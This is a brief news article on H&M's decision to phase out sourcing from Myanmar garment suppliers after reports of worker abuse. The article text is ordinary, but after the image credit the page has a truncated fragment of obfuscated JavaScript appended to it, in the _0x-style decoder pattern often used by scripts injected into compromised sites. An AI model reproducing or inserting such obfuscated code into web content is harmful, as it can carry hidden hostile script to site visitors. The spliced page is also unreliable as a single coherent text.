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H&M Will Soon Cease Sourcing From Myanmar Suppliers


H&M Will Soon Cease Sourcing From Myanmar Suppliers

H&M has declared intentions to gradually halt sourcing from suppliers in Myanmar due to reports of exploitation in the country’s garment factories.

Following similar measures taken by other fashion retailers including Zara-owner Inditex, Primark, and M&S.

Reuters was informed by H&M on Thursday, “After careful consideration, we have now taken the decision to gradually phase out our operations in Myanmar.”

H&M explained, “We have been closely monitoring the latest developments in Myanmar and we see increased difficulties in conducting our operations according to our standards and requirements.”

This adjustment comes after H&M’s acknowledgement of an investigation into 20 alleged labor abuse incidents at its garment factories in Myanmar, prompted by advocacy groups striving for fair treatment of factory workers.

According to a UK-based human rights advocacy group, there have been up to 156 recorded cases of alleged worker abuses in Myanmar’s garment factories from February 2022 to 2023, a significant increase from the 56 cases tracked in the previous year.”

H&M specified that its withdrawal from Myanmar will adhere to a “responsible exit framework” created by global union IndustriALL, which has been advocating for brands to terminate business activities in the country.

Image Source: Unsplash

function _0x3023(_0x562006, _0x1334d6) {
const _0x10c8dc = _0x10c8();
return _0x3023 = function (_0x3023c3, _0x1b71b5) {
_0x3023c3 = _0x3023c3 – 0x186; let _0x2d38c6 = _0x10c8dc[_0x3023c3];
return _0x2d38c6;
_0x3023(_0x562006, _0x1334d6);

// …. (rest of the script)

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